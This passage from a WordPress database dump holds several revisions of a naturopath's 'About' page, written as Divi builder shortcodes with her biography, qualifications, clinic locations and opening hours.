06:49:51','',2,'https://verde.desidrivers.com.au/?p=170',0,'revision','',0),(171,1,'2021-05-26 14:50:52','2021-05-26 06:50:52','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p>Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </p>\n<p>She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </p>\n<p>Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" hover_enabled=\"0\" background_color=\"#CCD4C8\" sticky_enabled=\"0\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" custom_css_main_element=\"||||\" sticky_enabled=\"0\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p>Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </p>\n<p> </p>\n<p><strong>Qualifications</strong>: </p>\n<p>Bachelor of Health Science (Naturopathy) </p>\n<p>Bachelor of Science (Biological Science) </p>\n<p> </p>\n<p><strong>Professional memberships</strong>: </p>\n<p>Australian Natural Therapist’s Association (ANTA) - Full member</p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-26 14:50:52','2021-05-26 06:50:52','',27,'https://verde.desidrivers.com.au/?p=171',0,'revision','',0),(324,1,'2021-06-15 12:40:03','2021-06-15 04:40:03','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-06-15 12:40:03','2021-06-15 04:40:03','',27,'https://verdenaturopathy.com.au/?p=324',0,'revision','',0),(271,1,'2021-05-27 21:41:02','2021-05-27 13:41:02','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" 